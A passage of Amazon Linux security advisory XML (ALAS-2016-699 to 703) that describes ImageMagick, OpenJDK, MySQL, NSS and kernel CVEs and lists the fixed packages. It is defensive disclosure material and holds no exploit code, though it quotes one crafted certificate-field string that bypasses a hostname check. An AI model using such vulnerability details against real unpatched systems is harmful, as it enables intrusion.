arch="i686"><filename>Packages/php56-mbstring-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.21-1.124.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.21" release="1.124.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.21-1.124.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-699</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-699: important priority package update for ImageMagick</title><issued date="2016-05-11 11:00:00" /><updated date="2016-05-11 11:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3718:
A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images.
1332802:
CVE-2016-3718 ImageMagick: SSRF vulnerability
CVE-2016-3717:
It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to disclose the contents of arbitrary files.
1332505:
CVE-2016-3717 ImageMagick: Local file read
CVE-2016-3716:
It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to move arbitrary files.
1332504:
CVE-2016-3716 ImageMagick: File moving
CVE-2016-3715:
It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete arbitrary files.
1332500:
CVE-2016-3715 ImageMagick: File deletion
CVE-2016-3714:
It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application.
1332492:
CVE-2016-3714 ImageMagick: Insufficient shell characters filtering
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3714" title="" id="CVE-2016-3714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3715" title="" id="CVE-2016-3715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3716" title="" id="CVE-2016-3716" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3717" title="" id="CVE-2016-3717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3718" title="" id="CVE-2016-3718" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-debuginfo" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.7.8.9-13.19.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.7.8.9-13.19.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" release="13.19.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-700</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-700: critical priority package update for java-1.6.0-openjdk</title><issued date="2016-05-11 11:00:00" /><updated date="2016-05-11 11:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3427:
It was discovered that the RMI server implementation in the JMX component in OpenJDK did not restrict which classes can be deserialized when deserializing authentication credentials. A remote, unauthenticated attacker able to connect to a JMX port could possibly use this flaw to trigger deserialization flaws.
1328210:
CVE-2016-3427 OpenJDK: unrestricted deserialization of authentication credentials (JMX, 8144430)
CVE-2016-3425:
It was discovered that the JAXP component in OpenJDK failed to properly handle Unicode surrogate pairs used as part of the XML attribute values. Specially crafted XML input could cause a Java application to use an excessive amount of memory when parsed.
1328040:
CVE-2016-3425 OpenJDK: incorrect handling of surrogate pairs in XML attribute values (JAXP, 8143167)
CVE-2016-0695:
It was discovered that the Security component in OpenJDK failed to check the digest algorithm strength when generating DSA signatures. The use of a digest weaker than the key strength could lead to the generation of signatures that were weaker than expected.
1328022:
CVE-2016-0695 OpenJDK: insufficient DSA key parameters checks (Security, 8138593)
CVE-2016-0687:
Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77 and Java SE Embedded 8u77 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to the Hotspot sub-component.
1327749:
CVE-2016-0687 OpenJDK: insufficient byte type checks (Hotspot, 8132051)
CVE-2016-0686:
Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77 and Java SE Embedded 8u77 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Serialization.
1327743:
CVE-2016-0686 OpenJDK: insufficient thread consistency checks in ObjectInputStream (Serialization, 8129952)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0686" title="" id="CVE-2016-0686" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0687" title="" id="CVE-2016-0687" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0695" title="" id="CVE-2016-0695" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3425" title="" id="CVE-2016-3425" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3427" title="" id="CVE-2016-3427" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-src" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.39-1.13.11.1.74.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.39" release="1.13.11.1.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.39-1.13.11.1.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-701</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-701: critical priority package update for mysql56</title><issued date="2016-05-18 14:00:00" /><updated date="2016-05-18 14:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2047:
The ssl_verify_server_cert function in sql-common/client.c in MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10; Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier; and Percona Server do not properly verify that the server hostname matches a domain name in the subject&#039;s Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a &quot;/CN=&quot; string in a field in a certificate, as demonstrated by &quot;/OU=/CN=bar.com/CN=foo.com.&quot;
1301874:
CVE-2016-2047 mysql: ssl-validate-cert incorrect hostname check
CVE-2016-0705:
A double-free flaw was found in the way OpenSSL parsed certain malformed DSA (Digital Signature Algorithm) private keys. An attacker could create specially crafted DSA private keys that, when processed by an application compiled against OpenSSL, could cause the application to crash.
1310596:
CVE-2016-0705 OpenSSL: Double-free in DSA code
CVE-2016-0666:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to Security: Privileges.
1329270:
CVE-2016-0666 mysql: unspecified vulnerability in subcomponent: Server: Security: Privileges (CPU April 2016)
CVE-2016-0655:
Unspecified vulnerability in Oracle MySQL 5.6.29 and earlier and 5.7.11 and earlier allows local users to affect availability via vectors related to InnoDB.
1329259:
CVE-2016-0655 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU April 2016)
CVE-2016-0648:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to PS.
1329251:
CVE-2016-0648 mysql: unspecified vulnerability in subcomponent: Server: PS (CPU April 2016)
CVE-2016-0647:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to FTS.
1329249:
CVE-2016-0647 mysql: unspecified vulnerability in subcomponent: Server: FTS (CPU April 2016)
CVE-2016-0643:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect confidentiality via vectors related to DML.
1329245:
CVE-2016-0643 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU April 2016)
CVE-2016-0642:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect integrity and availability via vectors related to Federated.
1329243:
CVE-2016-0642 mysql: unspecified vulnerability in subcomponent: Server: Federated (CPU April 2016)
CVE-2016-0639:
Unspecified vulnerability in Oracle MySQL 5.6.29 and earlier and 5.7.11 and earlier allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Pluggable Authentication.
1329238:
CVE-2016-0639 mysql: unspecified vulnerability in subcomponent: Server: Pluggable Authentication (CPU April 2016)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0639" title="" id="CVE-2016-0639" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0642" title="" id="CVE-2016-0642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0643" title="" id="CVE-2016-0643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0647" title="" id="CVE-2016-0647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0648" title="" id="CVE-2016-0648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0655" title="" id="CVE-2016-0655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0666" title="" id="CVE-2016-0666" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0705" title="" id="CVE-2016-0705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2047" title="" id="CVE-2016-2047" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-libs" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.30-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-702</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-702: medium priority package update for nspr nss-util nss nss-softokn</title><issued date="2016-05-18 14:00:00" /><updated date="2016-05-18 14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1979:
A use-after-free flaw was found in the way NSS processed certain DER (Distinguished Encoding Rules) encoded cryptographic keys. An attacker could use this flaw to create a specially crafted DER encoded certificate which, when parsed by an application compiled against the NSS library, could cause that application to crash, or execute arbitrary code using the permissions of the user running the application.
1315202:
CVE-2016-1979 nss: Use-after-free during processing of DER encoded keys in NSS (MFSA 2016-36)
CVE-2016-1978:
A use-after-free flaw was found in the way NSS handled DHE (DiffieHellman key exchange) and ECDHE (Elliptic Curve Diffie-Hellman key exchange) handshake messages. A remote attacker could send a specially crafted handshake message that, when parsed by an application linked against NSS, would cause that application to crash or, under certain special conditions, execute arbitrary code using the permissions of the user running the application.
1315565:
CVE-2016-1978 nss: Use-after-free in NSS during SSL connections in low memory (MFSA 2016-15)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1978" title="" id="CVE-2016-1978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1979" title="" id="CVE-2016-1979" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-debuginfo" version="4.11.0" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.11.0-1.37.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.11.0" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.11.0-1.37.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.11.0" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.11.0-1.37.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.11.0" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.11.0-1.37.amzn1.i686.rpm</filename></package><package name="nspr" version="4.11.0" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.11.0-1.37.amzn1.i686.rpm</filename></package><package name="nspr-debuginfo" version="4.11.0" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.11.0-1.37.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.21.0-2.2.50.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.21.0-2.2.50.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.21.0-2.2.50.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.21.0-2.2.50.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.21.0-2.2.50.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.21.0" release="2.2.50.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.21.0-2.2.50.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.16.2.3-14.2.38.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="14.2.38.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.16.2.3-14.2.38.amzn1.i686.rpm</filename></package><package name="nss" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.21.0" release="9.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.21.0-9.76.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.21.0-9.76.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.21.0" release="9.76.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.21.0-9.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-703</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-703: medium priority package update for kernel</title><issued date="2016-05-18 14:00:00" /><updated date="2016-05-18 14:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4581:
1333712:
CVE-2016-4581 kernel: Slave being first propagated copy causes oops in propagate_mnt
CVE-2016-4565:
1310570:
CVE-2016-4565 kernel: infiniband: Unprivileged process can overwrite kernel memory using rdma_ucm.ko
CVE-2016-4558:
1334303:
CVE-2016-4558 kernel: bpf: refcnt overflow
CVE-2016-4557:
1334307:
CVE-2016-4557 kernel: Use after free vulnerability via double fdput
CVE-2016-4486:
1333316:
CVE-2016-4486 kernel: Information leak in rtnetlink
CVE-2016-4485:
1333309:
CVE-2016-4485 kernel: Information leak in llc module
CVE-2016-3961:
Xen and the Linux kernel through 4.5.x do not properly suppress hugetlbfs support in x86 PV guests, which allows local PV guest users to cause a denial of service (guest OS crash) by attempting to access a hugetlbfs mapped area.
1323956:
CVE-2016-3961 xsa174 xen: hugetlbfs use may crash PV Linux guests (XSA-174)
CVE-2016-0758:
A flaw was found in the way the Linux kernel&#039;s ASN.1 DER decoder processed certain certificate files with tags of indefinite length. A local, unprivileged user could use a specially crafted X.509 certificate DER file to crash the system or, potentially, escalate their privileges on the system.
1300257:
CVE-2016-0758 kernel: tags with indefinite length can corrupt pointers in asn1_find_indefinite_length()
CVE-2015-8839:
Multiple race conditions in the ext4 filesystem implementation in the Linux kernel before 4.5 allow local users to cause a denial of service (disk corruption) by writing to a page that is associated with a different user&#039;s file after unsynchronized hole punching and page-fault handling.
1323577:
CVE-2015-8839 kernel: ext4 filesystem page fault race condition with fallocate call.
